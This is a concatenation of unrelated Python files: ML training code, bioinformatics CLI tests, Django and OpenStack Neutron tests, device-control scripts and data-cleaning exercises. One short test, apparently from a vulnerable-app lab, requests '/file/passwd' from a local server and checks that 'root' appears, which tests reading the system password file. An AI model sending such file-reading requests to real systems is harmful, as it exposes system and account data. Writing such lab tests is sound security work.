print("in[0]: {} in[1]: {} out: {} ".format(model.a, model.b, model.out )) print("\r\nTranslate design into systemVerilog...\r\n") ModeltoTranslate = Gcd_fsm(b8) ModeltoTranslate.elaborate() ModeltoTranslate.yosys_translate_import = True ModeltoTranslate = TranslationImportPass()( ModeltoTranslate ) ModeltoTranslate.elaborate()#!/usr/bin/env python # -*- coding: utf-8 -*- """Tests for `merge_fastq` package.""" import os import pytest import subprocess from click.testing import CliRunner from merge_fastq import merge_fastq from merge_fastq import cli def test_command_line_interface(): """Test the CLI.""" runner = CliRunner() #result = runner.invoke(cli.main) #assert result.exit_code == 0 #assert 'merge_fastq.cli.main' in result.output help_result = runner.invoke(cli.main, ['--help']) assert help_result.exit_code == 0 def test_multi_fastq(): cmd = [ "merge_fastq", "--fastq1", "data/test/test_R1_001.fastq.gz", "--fastq1", "data/test/test_R1_002.fastq.gz", "--fastq1", "data/test/test_R1_003.fastq.gz", "--fastq2", "data/test/test_R2_001.fastq.gz", "--fastq2", "data/test/test_R2_002.fastq.gz", "--fastq2", "data/test/test_R2_003.fastq.gz", "--out-fastq1", "test_R1_merged.fastq.gz", "--out-fastq2", "test_R2_merged.fastq.gz" ] ret_code = run_cmd(cmd) assert ret_code == 0 assert os.path.isfile("test_R1_merged.fastq.gz") is True assert os.path.isfile("test_R2_merged.fastq.gz") is True def test_single_fastq(): cmd = [ "merge_fastq", "--fastq1", "data/test/test_R1_001.fastq.gz", "--fastq2", "data/test/test_R2_001.fastq.gz", ] ret_code = run_cmd(cmd) assert ret_code == 0 assert os.path.isfile("merged_fastq_R1.fastq.gz") is True assert os.path.isfile("merged_fastq_R2.fastq.gz") is True def run_cmd(cmd): print("Command:", cmd) process = subprocess.Popen( cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE) output, errors = process.communicate() ret_code = process.wait() return ret_code <filename>utils.py def convert_wind_to_events(event_series, top_C, start_C): flag = False event_start = [] for i in range(len(event_series)): if not flag: if event_series[i] > top_C: event_start.append(i) flag = True else: if event_series[i] < top_C: flag = False event_top = [] for i in range(len(event_start)): while (event_start[i]-1 >= 0) and (event_series[event_start[i]-1] < event_series[event_start[i]]) and (event_series[event_start[i]] > start_C): event_start[i] = event_start[i]-1 event_top = event_start[:] for i in range(len(event_top)): while (event_top[i]+1 < len(event_series)) and (event_series[event_top[i]+1] > event_series[event_top[i]]): event_top[i] = event_top[i]+1 return event_start, event_top def get_random_name(): import random return "d" + str(random.randint(1, 10000)) import os import time import torch import datetime import torch.nn.functional as F import torch.autograd as autograd import numpy as np from torch.autograd import Variable from config import parse_args from utils import save_sample from model import Generator, Discriminator, weights_init_normal from dataloader import celeba_loader def criterion_cls(logit, target): return F.binary_cross_entropy_with_logits(logit, target, size_average=False) / logit.size(0) def compute_gradient_penalty(D, real_samples, fake_samples, FloatTensor): alpha = FloatTensor(np.random.random((real_samples.size(0), 1, 1, 1))) interpolates = (alpha * real_samples + ((1 - alpha) * fake_samples)).requires_grad_(True) d_interpolates, _ = D(interpolates) fake = Variable(FloatTensor(np.ones(d_interpolates.shape)), requires_grad=False) gradients = autograd.grad(outputs=d_interpolates, inputs=interpolates, grad_outputs=fake, create_graph=True, retain_graph=True, only_inputs=True)[0] gradients = gradients.view(gradients.size(0), -1) gradient_penalty = ((gradients.norm(2, dim=1) - 1) ** 2).mean() return gradient_penalty def train(): opt = parse_args() os.makedirs("images/%s" % (opt.dataset), exist_ok=True) os.makedirs("checkpoints/%s" % (opt.dataset), exist_ok=True) cuda = True if torch.cuda.is_available() else False FloatTensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor # get dataloader train_loader = celeba_loader(opt, mode='train') val_loader = celeba_loader(opt, mode='val') # Dimensionality c_dim = len(opt.selected_attrs) # Initialize generator and discriminator generator = Generator(opt.channels, opt.residual_blocks, c_dim) discriminator = Discriminator(opt.channels, opt.img_height, c_dim) # Initialize weights generator.apply(weights_init_normal) discriminator.apply(weights_init_normal) # Loss function cycle_loss = torch.nn.L1Loss() if cuda: generator = generator.cuda() discriminator = discriminator.cuda() cycle_loss.cuda() # Optimizers optimizer_G = torch.optim.Adam(generator.parameters(), lr=opt.lr, betas=(opt.b1, opt.b2)) optimizer_D = torch.optim.Adam(discriminator.parameters(), lr=opt.lr, betas=(opt.b1, opt.b2)) # ------------ # Training # ------------ prev_time = time.time() for epoch in range(opt.epochs): for i, (imgs, labels) in enumerate(train_loader): # Model inputs imgs = Variable(imgs.type(FloatTensor)) labels = Variable(labels.type(FloatTensor)) # Sample label as generator inputs and Generate fake batch of images sampled_c = Variable(FloatTensor(np.random.randint(0, 2, (imgs.size(0), c_dim)))) fake_imgs = generator(imgs, sampled_c) # ---------------------- # Train Discriminator # ---------------------- optimizer_D.zero_grad() real_validity, pred_cls = discriminator(imgs) fake_validity, _ = discriminator(fake_imgs.detach()) gradient_penalty = compute_gradient_penalty(discriminator, imgs.data, fake_imgs.data, FloatTensor) d_adv_loss = -torch.mean(real_validity) + torch.mean(fake_validity) + opt.lambda_gp * gradient_penalty d_cls_loss = criterion_cls(pred_cls, labels) D_loss = d_adv_loss + opt.lambda_cls * d_cls_loss D_loss.backward() optimizer_D.step() # ----------------------------- # Train Generators # ----------------------------- optimizer_G.zero_grad() if i % opt.n_critic == 0: gen_imgs = generator(imgs, sampled_c) recov_imgs = generator(gen_imgs, labels) fake_validity, pred_cls = discriminator(gen_imgs) g_adv_loss = -torch.mean(fake_validity) g_cls_loss = criterion_cls(pred_cls, sampled_c) g_rec_loss = cycle_loss(recov_imgs, imgs) G_loss = g_adv_loss + opt.lambda_cls * g_cls_loss + opt.lambda_rec * g_rec_loss G_loss.backward() optimizer_G.step() # ------------------ # Log Information # ------------------ batches_done = epoch * len(train_loader) + i batches_left = opt.epochs * len(train_loader) - batches_done time_left = datetime.timedelta(seconds=batches_left * (time.time() - prev_time)) prev_time = time.time() print("[Epoch %d/%d] [Batch %d/%d] [D loss: %f, aux: %f] [G loss: %f, aux: %f, cycle: %f] ETA: %s" % (epoch, opt.epochs, i, len(train_loader), D_loss.item(), d_cls_loss.item(), G_loss.item(), g_cls_loss.item(), g_rec_loss, time_left)) if batches_done % opt.sample_interval == 0: save_sample(opt.dataset, val_loader, batches_done, generator, FloatTensor) if batches_done % opt.checkpoint_interval == 0: torch.save(Generator.state_dict(), "checkpoints/%s/G_%d.pth" % (opt.dataset, epoch)) torch.save(Generator.state_dict(), "checkpoints/%s/shared_E_done.pth" % opt.dataset) print("Training Process has been Done!") if __name__ == '__main__': train() <reponame>tellg/arxcode # -*- coding: utf-8 -*- # Generated by Django 1.11.15 on 2018-12-07 12:02 from __future__ import unicode_literals from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('dominion', '0036_plotaction_working'), ] operations = [ migrations.AlterField( model_name='plotaction', name='plot', field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='actions', to='dominion.Plot'), ), ] <filename>common/image_helper.py<gh_stars>100-1000 import tensorflow as tf # Below method is borrowed from tensorflow official repository # https://github.com/tensorflow/tensorflow/blob/a0b8cee815100b805a24fedfa12b28139d24e7fe/tensorflow/python/ops/image_ops_impl.py def _verify_compatible_image_shapes(img1, img2): """Checks if two image tensors are compatible for applying SSIM or PSNR. This function checks if two sets of images have ranks at least 3, and if the last three dimensions match. Args: img1: Tensor containing the first image batch. img2: Tensor containing the second image batch. Returns: A tuple containing: the first tensor shape, the second tensor shape, and a list of control_flow_ops.Assert() ops implementing the checks. Raises: ValueError: When static shape check fails. """ shape1 = img1.get_shape().with_rank_at_least(3) shape2 = img2.get_shape().with_rank_at_least(3) shape1[-3:].assert_is_compatible_with(shape2[-3:]) if shape1.ndims is not None and shape2.ndims is not None: for dim1, dim2 in zip(reversed(shape1[:-3]), reversed(shape2[:-3])): if not (dim1 == 1 or dim2 == 1 or dim1.is_compatible_with(dim2)): raise ValueError( "Two images are not compatible: %s and %s" % (shape1, shape2)) # Now assign shape tensors. shape1, shape2 = tf.shape_n([img1, img2]) checks = [] checks.append(tf.Assert( tf.greater_equal(tf.size(shape1), 3), [shape1, shape2], summarize=10)) checks.append(tf.Assert( tf.reduce_all(tf.equal(shape1[-3:], shape2[-3:])), [shape1, shape2], summarize=10)) return shape1, shape2, checks def sobel_gradient(img): """Get image and calculate the result of sobel filter. Args: imgs: Image Tensor. Either 3-D or 4-D. Return: A Tensor which concat the result of sobel in both horizontally and vertically. Therefore, number of the channels is doubled. """ num_channels = img.get_shape().as_list()[-1] # load filter which can be reused with tf.variable_scope("misc/img_gradient", reuse=tf.AUTO_REUSE): filter_x = tf.constant([[-1/8, 0, 1/8], [-2/8, 0, 2/8], [-1/8, 0, 1/8]], name="sobel_x", dtype=tf.float32, shape=[3, 3, 1, 1]) filter_x = tf.tile(filter_x, [1, 1, num_channels, 1]) filter_y = tf.constant([[-1/8, -2/8, -1/8], [0, 0, 0], [1/8, 2/8, 1/8]], name="sobel_y", dtype=tf.float32, shape=[3, 3, 1, 1]) filter_y = tf.tile(filter_y, [1, 1, num_channels, 1]) # calculate grad_x = tf.nn.depthwise_conv2d(img, filter_x, strides=[1, 1, 1, 1], padding="VALID", name="grad_x") grad_y = tf.nn.depthwise_conv2d(img, filter_y, strides=[1, 1, 1, 1], padding="VALID", name="grad_y") grad_xy = tf.concat([grad_x, grad_y], axis=-1) return grad_xy def _first_deriviate_gaussian_filters(size, sigma): size = tf.convert_to_tensor(size, tf.int32) sigma = tf.convert_to_tensor(sigma, tf.float32) sigma2 = tf.square(sigma) coords = tf.cast(tf.range(size), sigma.dtype) coords -= tf.cast(size - 1, sigma.dtype) / 2.0 g = tf.square(coords) g *= -0.5 / tf.square(sigma) g = tf.reshape(g, shape=[1, -1]) + tf.reshape(g, shape=[-1, 1]) g = tf.reshape(g, shape=[1, -1]) # For tf.nn.softmax(). g = tf.nn.softmax(g) g = tf.reshape(g, shape=[size, size]) # https://cedar.buffalo.edu/~srihari/CSE555/Normal2.pdf # https://github.com/scipy/scipy/blob/v0.14.0/scipy/ndimage/filters.py#L179 gx = -1 * tf.reshape(coords, shape=[1, -1]) * g / sigma2 gy = -1 * tf.reshape(coords, shape=[-1, 1]) * g / sigma2 # gx = tf.reshape(gx, shape=[1, -1]) # For tf.nn.softmax(). # gy = tf.reshape(gy, shape=[1, -1]) # For tf.nn.softmax(). # gx = tf.nn.softmax(gx) # gy = tf.nn.softmax(gy) return tf.reshape(gx, shape=[size, size, 1, 1]), tf.reshape(gy, shape=[size, size, 1, 1]) def first_deriviate_gaussian_gradient(img, sigma): """Get image and calculate the result of first deriviate gaussian filter. Now, implementation assume that channel is 1. https://www.juew.org/publication/CVPR09_evaluation_final_HQ.pdf Args: imgs: Image Tensor. Either 3-D or 4-D. Return: A Tensor which concat the result of sobel in both horizontally and vertically. Therefore, number of the channels is doubled. """ num_channels = img.get_shape().as_list()[-1] assert num_channels == 1 # load filter which can be reused with tf.variable_scope("misc/img_gradient", reuse=tf.AUTO_REUSE): # truncate for 3 sigma half_width = int(3 * sigma + 0.5) size = 2 * half_width + 1 filter_x, filter_y = _first_deriviate_gaussian_filters(size, sigma) # calculate grad_x = tf.nn.depthwise_conv2d(img, filter_x, strides=[1, 1, 1, 1], padding="VALID", name="grad_x") grad_y = tf.nn.depthwise_conv2d(img, filter_y, strides=[1, 1, 1, 1], padding="VALID", name="grad_y") grad_xy = tf.concat([grad_x, grad_y], axis=-1) return grad_xy <reponame>BeatHubmann/19F-HPC2 import subprocess p = 1 avg = 3 timings = {} for gc in range(2, 6): for ur in range(1, 6): for dr in range(1, 11): result = {} time = 0 for _ in range(avg): output = subprocess.check_output( ['./heat2d', '-p', str(p), '-v', '-gc', str(gc), '-ur', str(ur), '-dr', str(dr)]) for row in output.decode('utf-8').split('\n'): if ': ' in row: key, value = row.split(': ') result[key.strip()] = value.strip('s') time += float(result['Running Time']) time /= avg timings['gc= ' + str(gc) + ' ur= ' + str(ur) + ' dr= ' + str(dr)] = time print(gc, ur, dr, time) [print(key , ' : ' , value, 's') for (key, value) in sorted(timings.items() , key=lambda x: x[1] ) ] from bs4 import BeautifulSoup import requests def test_act6(): session = requests.session() login = session.post("http://localhost:5000/login", {"username": "<EMAIL>", "password": "password"}).text send_ssrf = session.get("http://localhost:5000/file/passwd").content soup = BeautifulSoup(send_ssrf, "html.parser") text=soup.find_all(text=True) assert "root" in text[0] if __name__ == "__main__": test_act6() # Copyright 2015 Red Hat, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import functools import os import signal from neutron.agent.common import async_process from neutron.agent.linux import utils from neutron.common import utils as common_utils from neutron.tests.functional.agent.linux import test_async_process from neutron.tests.functional import base as functional_base class TestPIDHelpers(test_async_process.AsyncProcessTestFramework): def test_get_cmdline_from_pid_and_pid_invoked_with_cmdline(self): cmd = ['tail', '-f', self.test_file_path] proc = async_process.AsyncProcess(cmd) proc.start(block=True) self.addCleanup(proc.stop) pid = proc.pid self.assertEqual(cmd, utils.get_cmdline_from_pid(pid)) self.assertTrue(utils.pid_invoked_with_cmdline(pid, cmd)) self.assertEqual([], utils.get_cmdline_from_pid(-1)) class TestGetRootHelperChildPid(functional_base.BaseSudoTestCase): def _addcleanup_sleep_process(self, parent_pid): sleep_pid = utils.execute( ['ps', '--ppid', parent_pid, '-o', 'pid=']).strip() self.addCleanup( utils.execute, ['kill', '-9', sleep_pid], check_exit_code=False, run_as_root=True) def test_get_root_helper_child_pid_returns_first_child(self): """Test that the first child, not lowest child pid is returned. Test creates following process tree: sudo + | +--rootwrap + | +--bash+ | +--sleep 100 and tests that pid of `bash' command is returned. """ def wait_for_sleep_is_spawned(parent_pid): proc_tree = utils.execute( ['pstree', parent_pid], check_exit_code=False) processes = [command.strip() for command in proc_tree.split('---') if command] if processes: return 'sleep' == processes[-1] cmd = ['bash', '-c', '(sleep 100)'] proc = async_process.AsyncProcess(cmd, run_as_root=True) proc.start() # root helpers spawn their child processes asynchronously, and we # don't want to use proc.start(block=True) as that uses # get_root_helper_child_pid (The method under test) internally. sudo_pid = proc._process.pid common_utils.wait_until_true( functools.partial( wait_for_sleep_is_spawned, sudo_pid), sleep=0.1) child_pid = utils.get_root_helper_child_pid( sudo_pid, cmd, run_as_root=True) self.assertIsNotNone( child_pid, "get_root_helper_child_pid is expected to return the pid of the " "bash process") self._addcleanup_sleep_process(child_pid) with open('/proc/%s/cmdline' % child_pid, 'r') as f_proc_cmdline: cmdline = f_proc_cmdline.readline().split('\0')[0] self.assertIn('bash', cmdline) class TestFindParentPid(functional_base.BaseSudoTestCase): def _stop_process(self, process): process.stop(kill_signal=signal.SIGKILL) def _test_process(self, run_as_root): test_pid = str(os.getppid()) cmd = ['bash', '-c', '(sleep 10)'] proc = async_process.AsyncProcess(cmd, run_as_root=run_as_root) proc.start() self.addCleanup(self._stop_process, proc) common_utils.wait_until_true(lambda: proc._process.pid, sleep=0.5, timeout=10) bash_pid = utils.find_parent_pid(proc._process.pid) testcase_pid = utils.find_parent_pid(bash_pid) self.assertEqual(test_pid, testcase_pid) def test_root_process(self): self._test_process(run_as_root=True) def test_non_root_process(self): self._test_process(run_as_root=False) class TestGetProcessCountByName(functional_base.BaseSudoTestCase): def _stop_processes(self, processes): for process in processes: process.stop(kill_signal=signal.SIGKILL) def test_root_process(self): cmd = ['sleep', '100'] processes = [] for _ in range(20): process = async_process.AsyncProcess(cmd) process.start() processes.append(process) for process in processes: common_utils.wait_until_true(lambda: process._process.pid, sleep=0.5, timeout=5) self.addCleanup(self._stop_processes, processes) number_of_sleep = utils.get_process_count_by_name('sleep') # NOTE(ralonsoh): other tests can spawn sleep processes too, but at # this point we know there are, at least, 20 "sleep" processes running. self.assertLessEqual(20, number_of_sleep) class TestFindChildPids(functional_base.BaseSudoTestCase): def _stop_process(self, process): process.stop(kill_signal=signal.SIGKILL) def test_find_child_pids(self): pid = os.getppid() child_pids = utils.find_child_pids(pid) child_pids_recursive = utils.find_child_pids(pid, recursive=True) for _pid in child_pids: self.assertIn(_pid, child_pids_recursive) cmd = ['sleep', '100'] process = async_process.AsyncProcess(cmd) process.start() common_utils.wait_until_true(lambda: process._process.pid, sleep=0.5, timeout=10) self.addCleanup(self._stop_process, process) child_pids_after = utils.find_child_pids(pid) child_pids_recursive_after = utils.find_child_pids(pid, recursive=True) self.assertEqual(child_pids, child_pids_after) for _pid in child_pids + [process.pid]: self.assertIn(_pid, child_pids_recursive_after) def test_find_non_existing_process(self): with open('/proc/sys/kernel/pid_max', 'r') as fd: pid_max = int(fd.readline().strip()) self.assertEqual([], utils.find_child_pids(pid_max)) <gh_stars>0 from pyblish import api class ValidateOutputRange(api.InstancePlugin): """Validate the output range of the task. This compares the output range and clip associated with the task, so see whether there is a difference. This difference indicates that the user has selected to export the clip length for the task which is very uncommon to do. """ order = api.ValidatorOrder families = ["trackItem.task"] label = "Output Range" hosts = ["hiero"] optional = True def process(self, instance): task = instance.data["task"] item = instance.data["parent"] output_range = task.outputRange() first_frame = int(item.data["item"].source().sourceIn()) last_frame = int(item.data["item"].source().sourceOut()) clip_duration = last_frame - first_frame + 1 difference = clip_duration - output_range[1] failure_message = ( 'Looks like you are rendering the clip length for the task ' 'rather than the cut length. If this is intended, just uncheck ' 'this validator after resetting, else adjust the export range in ' 'the "Handles" section of the export dialog.' ) assert difference, failure_message class ValidateImageSequence(api.InstancePlugin): """Validate image sequence output path is setup correctly.""" order = api.ValidatorOrder families = ["trackItem.task", "img"] match = api.Subset label = "Image Sequence" hosts = ["hiero"] optional = True def process(self, instance): resolved_path = instance.data["task"].resolvedExportPath() msg = ( "Image sequence output is missing a padding. Please add \"####\" " "or \"%04d\" to the output templates." ) assert "#" in resolved_path or "%" in resolved_path, msg # -------------- from csv import reader # Read the data file and store it as a list 'movies' opened_file = open(path, encoding="utf8") read_file = reader(opened_file) movies = list(read_file) # The first row is header. Extract and store it in 'movies_header'. movies_header=movies[0] # Subset the movies dataset such that the header is removed from the list and store it back in movies movies=movies[1:] def explore_data(dataset, start, end, rows_and_columns=False): data=dataset[start:end] for row in data: print(row) print('\n') explore_data(movies,4553,4553) # Delete wrong data del movies[4553] explore_data(movies,0,5) #identifying duplicate movies def duplicate_and_unique_movies(dataset, index_): unique_movie=[] duplicate_movie=[] for movie in dataset: name=movie[index_] if name in unique_movie: duplicate_movie.append(name) else: unique_movie.append(name) print("No of duplicate movies:",len(duplicate_movie)) print('\n') print("Examples of duplicate movies",duplicate_movie[:5]) duplicate_and_unique_movies(movies,-2) # Create a dictionary, 'reviews_max' that will have the name of the movie as key, and the maximum number of reviews as values. reviews_max={} for movie in movies: name=movie[-2] reviews=movie[-3] if name in reviews_max and reviews_max[name]<reviews: reviews_max[name]=reviews elif name not in reviews_max: reviews_max[name]=reviews print(len(movies)) print(len(reviews_max)) # Create a list 'movies_clean', which will filter out the duplicate movies and contain the rows with maximum number of reviews for duplicate movies, as stored in 'review_max'. movies_clean=[] movies_name=[] for data in movies: name=data[-2] reviews=data[-3] if reviews_max[name]==reviews and name not in movies_name : movies_clean.append(data) movies_name.append(name) print(len(movies_clean)) print(len(movies_name)) # Creating movies_lang(), extract all the english movies and store it in movies_en. def movies_lang(dataset, index_, lang_): movies_=[] for movie in movies: lang=movie[index_] if lang==lang_: movies_.append(movie) print(len(movies_)) return movies_ movies_en=movies_lang(movies_clean,3,"en") #Create the rate_bucket function to see the movies with rating higher than 8. def rate_bucket(dataset, rate_low, rate_high): high_rated_movies=[] for movie in dataset: rating=float(movie[-4]) if ((rating>=rate_low)and (rating<=rate_high)): high_rated_movies.append(movie) print(len(high_rated_movies)) return high_rated_movies high_rated_movies=rate_bucket(movies_en,8,10) <filename>allalgorithms/sorting/shell_sort.py # -*- coding: UTF-8 -*- # # Shell Sort Algorithm # The All ▲lgorithms library for python # # Contributed by: Elias # Github: @eliasbayona # def shell_sort(arr): n = len(arr) h = int(n/2) while h > 0: for i in range(h,n): temp = arr[i] j = i while j >= h and arr[j-h] >temp: arr[j] = arr[j-h] j -= h arr[j] = temp h = int(h/2) return arr <filename>tests/personal_test.py #%% import sys, os sys.path.append("C:/Users/Delgado/Documents/Research/rheology-data-toolkit/rheodata/extractors") import h5py import pandas as pd from antonpaar import AntonPaarExtractor as APE from ARES_G2 import ARES_G2Extractor # %% sys.path.append("C:/Users/Delgado/Documents/Research/rheology-data-toolkit/rheodata") from data_converter import rheo_data_transformer import json # %% # %% machine = APE() multi_file_test = "C:/Users/Delgado/Documents/Research/rheology-data-toolkit/tests/test_data/Anton_Paar/excel_test_data/Steady State Viscosity Curve-LO50C_excel.xlsx" output_folder = "/Users/Delgado/Documents/Research/chimad_project/rheodata/extractors/test_data/" modified_dict, test_raw, cols_info, units_info = machine.import_rheo_data(multi_file_test) # %% test = rheo_data_transformer(modified_data=modified_dict, raw_data=test_raw, cols_info=cols_info, units=units_info) test.load_to_hdf('hdf5_pickle_fix') # %% f = h5py.File("hdf5_pickle_fix.hdf5", "r") print(f["Project"].keys()) print(f["Project"]['Steady State Viscosity Curve-55C'].keys()) print(type(f["Project"]['Steady State Viscosity Curve-55C'].attrs["columns"])) test = f["Project"]['Steady State Viscosity Curve-55C'].attrs["columns"] raw_data = pd.read_hdf('hdf5_pickle_fix.hdf5', 'Project/Steady State Viscosity Curve-55C/clean_data') print(raw_data.head(10)) f.close() f = h5py.File(save_file_name +'.hdf5', "r") print(f.attrs["Project_Name"]) print(f.attrs["Author"]) print(f.attrs["Doi"]) print(f.attrs["Test_Type"]) print(f.attrs["Polymer"]) print(f.attrs["Instrument"]) f.close() # %% add test metadata as json file sample_metadata = { 'data origin':{ "project name": "Test_project", "authors":["<NAME>.", "Solo, <NAME>."], "ORCID":["8888", "1234"], "DOI": "https//8675309" }, 'instrument':{ "type": "rheometer", "make": "Anton Paar", "model": "MCR 302", "additional information":"50 mm plates" }, "polydat":{ "polymer_place_holder":"Test" } } test.add_project_metadata('hdf5_pickle_fix.hdf5', sample_metadata) f = h5py.File("hdf5_pickle_fix.hdf5", "r") test_project = f["Project"].attrs["project_metadata"] test_json = json.loads(test_project) f.close() # %% test_metadata = { 'Steady State Viscosity Curve-LO80C': { "Temperature":25, "Test Type": "Strain Sweep", "Polyanion_MW":100000, "Polycation_MW": 100000, "Polyanion_Charge_Fraction": 100, "Polycation_Charge_Fraction": 100, "Salt_Type": "potassium bromide", "Salt_Concentration": 10, "Solvent": "water", "Solvent_concentration":25, "columns":[] }, 'Steady State Viscosity Curve-75C': { "Temperature":100, "Test Type": "Freq Sweep", "Polyanion_MW":500, "Polycation_MW": 5000, "Polyanion_Charge_Fraction": 100, "Polycation_Charge_Fraction": 100, "Salt_Type": "potassium bromide", "Salt_Concentration": 20, "Solvent": "water", "Solvent_concentration":10, "columns":[] } } # %% test.add_test_metadata(test_metadata) # %% file_path = "C:/Users/Delgado/Documents/Research/rheology-data-toolkit/rheodata/extractors/swag.hdf5" f = h5py.File(file_path, "r") # %% project_metadata = { 'Author': '<NAME>', 'Test_Type': "Strain Sweep", 'Polyanion': 'polystyrene sulfonate', 'Polycation': 'poly (4-vinylpyridine)' } test.add_project_metadata("test3.hdf5", metadata) # %% f = h5py.File('test3.hdf5', "r") # %% f.attrs["name"] test = pd.read_hdf('swag.h5', 'top/Steady State Viscosity Curve/clean_data') # %% f.close() # %% #### ARES tests #### path = "C:/Users/Delgado/Documents/Research/rheology-data-toolkit/tests/test_data/ARES_G2/mixed_test_types/Copy of JeT_5k100-5k100_100mgml_amp_frq_swp_672017 copy.xls" ARES = ARES_G2Extractor(path) modified_output, raw_output, cols_info, units_info = ARES.process_workbook() test = rheo_data_transformer(modified_data=modified_output, raw_data=raw_output, cols_info=cols_info, units=units_info) test.load_to_hdf('AGRES_2_test') f = h5py.File("test_package.hdf5", "r") print(f["Project"].keys()) print(f["Project"]['Temperature Ramp - 1'].keys()) # %% ###### TESTS ####### failed_count=0 for key in test_raw.keys(): df = test_raw[key] if df.iloc[0,0] != 'Project:': print('test_failed') print(key) failed_count += 1 if failed_count == 0: print("Test Passed") else: print(failed_count) # %% failed_count=0 for key in test_raw.keys(): df = test_raw[key] if df.iloc[1,0] != 'Test:': print('test_failed') print(key) failed_count += 1 if failed_count == 0: print("Test Passed") else: print(failed_count) # %%from upydevice import Device, DeviceException from upydev.commandlib import _CMDDICT_ import sys from upydev.helpinfo import see_help KEY_N_ARGS = {'sd_enable': ['po']} VALS_N_ARGS = ['po'] SD_COMMANDS_HELP = """ > SD: Usage '$ upydev COMMAND [opts]' * COMMAND: - sd_enable: to enable/disable the LDO 3.3V regulator that powers the SD module use -po option to indicate the Pin. - sd_init: to initialize the sd card; (spi must be configured first) create sd object and mounts as a filesystem, needs sdcard.py see https://github.com/Carglglz/upydev/blob/master/DOCS/Documentation.md#sd_init - sd_deinit: to unmount sd card - sd_auto: experimental command, needs a sd module with sd detection pin and the SD_AM.py script. Enable an Interrupt with the sd detection pin, so it mounts the sd when is detected, and unmount the sd card when is extracted. See more info in: https://github.com/Carglglz/upydev/blob/master/DOCS/Documentation.md#sd_auto """ def sd_command(cmd, *args, **kargs): # FILTER KARGS if cmd not in KEY_N_ARGS: for varg in VALS_N_ARGS: if varg in kargs: kargs.pop(varg) else: for varg in VALS_N_ARGS: if varg in kargs and varg not in KEY_N_ARGS[cmd]: kargs.pop(varg) if cmd == 'sd': print(SD_COMMANDS_HELP) # SD_ENABLE elif cmd == 'sd_enable': po = kargs.pop('po') if po is None: print('Pin required, indicate it with -po option') see_help(cmd) else: po = po[0] dev = Device(*args, **kargs) enabled = dev.cmd(_CMDDICT_['SD_ENABLE'].format(po), silent=True, rtn_resp=True) if dev._traceback.decode() in dev.response: try: raise DeviceException(dev.response) except Exception as e: print(e) else: if enabled: print('SD Enabled') else: print('SD not Enabled') dev.disconnect() sys.exit() # SD_INIT elif cmd == 'sd_init': dev = Device(*args, **kargs) print('Initialzing SD card...') sd_mounted = dev.cmd(_CMDDICT_['SD_INIT'], silent=True, rtn_resp=True) if dev._traceback.decode() in dev.response: try: raise DeviceException(dev.response) except Exception as e: print(e) else: if sd_mounted: print('SD initiated and mounted Successfully!') else: print('SD could not be initiated.') dev.disconnect() sys.exit() # SD_DEINIT elif cmd == 'sd_deinit': dev = Device(*args, **kargs) print('Deinitialzing SD card...') sd_mounted = dev.cmd(_CMDDICT_['SD_DEINIT'], silent=True, rtn_resp=True) if dev._traceback.decode() in dev.response: try: raise DeviceException(dev.response) except Exception as e: print(e) else: if not sd_mounted: print('SD deinitiated Successfully!') else: print('SD could not be deinitiated.') dev.disconnect() sys.exit() # # SD_AUTO elif cmd == 'sd_auto': dev = Device(*args, **kargs) print('Autodetect SD Card mode enabled') dev.wr_cmd(_CMDDICT_['SD_AUTO'], follow=True) dev.disconnect() sys.exit() ######################################################################## # Copyright 2019 Roku, Inc. # #Licensed under the Apache License, Version 2.0 (the "License"); #you may not use this file except in compliance with the License. #You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #Unless required by applicable law or agreed to in writing, software #distributed under the License is distributed on an "AS IS" BASIS, #WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #See the License for the specific language governing permissions and #limitations under the License. ######################################################################## from webDriver import WebDriver web_driver = WebDriver("192.168.1.94") web_driver.launch_the_channel("dev") web_driver.verify_is_screen_loaded({"elementData": [{ "using": "text", "value": "ROW 1" }]}) web_driver.press_btn("select") web_driver.verify_is_screen_loaded({"elementData": [{ "using": "text", "value": "<NAME>, <NAME>" }]}) res = web_driver.verify_is_screen_loaded({"elementData": [{ "using": "text", "value": "Authenticate to watch" }]}, False, 2) if res == False: res = web_driver.verify_is_screen_loaded({"elementData": [{ "using": "text", "value": "Play" }]}) web_driver.press_btn("select") else: web_driver.press_btn("select") web_driver.verify_is_screen_loaded({"elementData": [{ "using": "text", "value": "Please enter your username" }]}) web_driver.send_word("user") web_driver.send_button_sequence(["down", "down", "down", "down", "select"]) web_driver.verify_is_screen_loaded({"elementData": [{ "using": "text", "value": "Please enter your password" }]}) web_driver.send_word("<PASSWORD>") web_driver.send_button_sequence(["down", "down", "down", "down", "select"]) web_driver.quiet()<filename>cycif_db/markers/_comparator.py """ Makrer comparator class. """ from ..model import Marker class Marker_Comparator: """ A wrapper class for comparison of Marker objects. Parameters ----------- marker: Marker object fluor_sensitive: bool, default is True. anti_sensitive: bool, default is False. keep_duplicates: str, default is 'keep'. """ def __init__(self, marker, fluor_sensitive=True, anti_sensitive=False, keep_duplicates='keep') -> None: self.marker = marker self.fluor_sensitive = fluor_sensitive self.anti_sensitive = anti_sensitive if keep_duplicates not in ('keep'): raise ValueError("Invalid input for argument `keep_duplicates`!") self.keep_duplicates = keep_duplicates def __repr__(self) -> str: rval = self.marker.name if self.fluor_sensitive and self.marker.fluor: rval += '_' + self.marker.fluor if self.anti_sensitive and self.marker.anti: rval += '_' + self.marker.anti if self.keep_duplicates == 'keep' and self.marker.duplicate: rval += '_' + self.marker.duplicate return rval def __eq__(self, other) -> bool: if not isinstance(other, Marker_Comparator): return False rval = (self.marker.name.lower() == other.marker.name.lower()) if self.fluor_sensitive: this_fluor = self.marker.fluor or '' other_fluor = other.marker.fluor or '' rval = rval and \ (this_fluor.lower() == other_fluor.lower()) if self.anti_sensitive: this_anti = self.marker.anti or '' other_anti = other.marker.anti or '' rval = rval and \ (this_anti.lower() == other_anti.lower()) return rval def __lt__(self, other) -> bool: return 